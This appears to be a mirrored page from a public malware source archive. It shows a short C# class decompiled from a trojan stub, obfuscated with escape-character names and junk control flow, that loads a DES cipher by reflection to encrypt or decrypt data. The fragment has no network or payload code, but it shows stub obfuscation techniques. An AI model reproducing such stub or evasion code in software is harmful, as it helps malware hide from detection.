mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 18:06:10 +00:00
f2ac1ece55
add
56 lines
1.6 KiB
C#
56 lines
1.6 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: Stub, Version=10.1.0.54, Culture=neutral, PublicKeyToken=null
|
||
// MVID: B6CAF90E-24AA-429E-AF0C-6337F759D114
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.ahnf-f30db11729cf0ce10842f0156b52feff345150c4261b159be49f67b8f7170c85.exe
|
||
|
||
using System;
|
||
using System.Reflection;
|
||
using System.Runtime.InteropServices;
|
||
using System.Security.Cryptography;
|
||
|
||
namespace \u0003
|
||
{
|
||
internal sealed class \u0001 : IDisposable
|
||
{
|
||
private readonly Type \u0001;
|
||
private readonly object \u0001;
|
||
|
||
public \u0001()
|
||
{
|
||
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
|
||
this.\u0001 = Activator.CreateInstance(this.\u0001);
|
||
}
|
||
|
||
public ICryptoTransform \u0002([In] byte[] obj0, [In] byte[] obj1, [In] bool obj2)
|
||
{
|
||
this.\u0001.GetProperty("Key").GetSetMethod().Invoke(this.\u0001, new object[1]
|
||
{
|
||
(object) obj0
|
||
});
|
||
this.\u0001.GetProperty("IV").GetSetMethod().Invoke(this.\u0001, new object[1]
|
||
{
|
||
(object) obj1
|
||
});
|
||
return (ICryptoTransform) this.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.\u0001, new object[0]);
|
||
}
|
||
|
||
public void \u0002()
|
||
{
|
||
do
|
||
{
|
||
if (true)
|
||
goto label_3;
|
||
label_2:
|
||
continue;
|
||
label_3:
|
||
this.\u0001.GetMethod("Clear").Invoke(this.\u0001, new object[0]);
|
||
goto label_2;
|
||
}
|
||
while (false);
|
||
}
|
||
|
||
public void Dispose() => this.\u0002();
|
||
}
|
||
}
|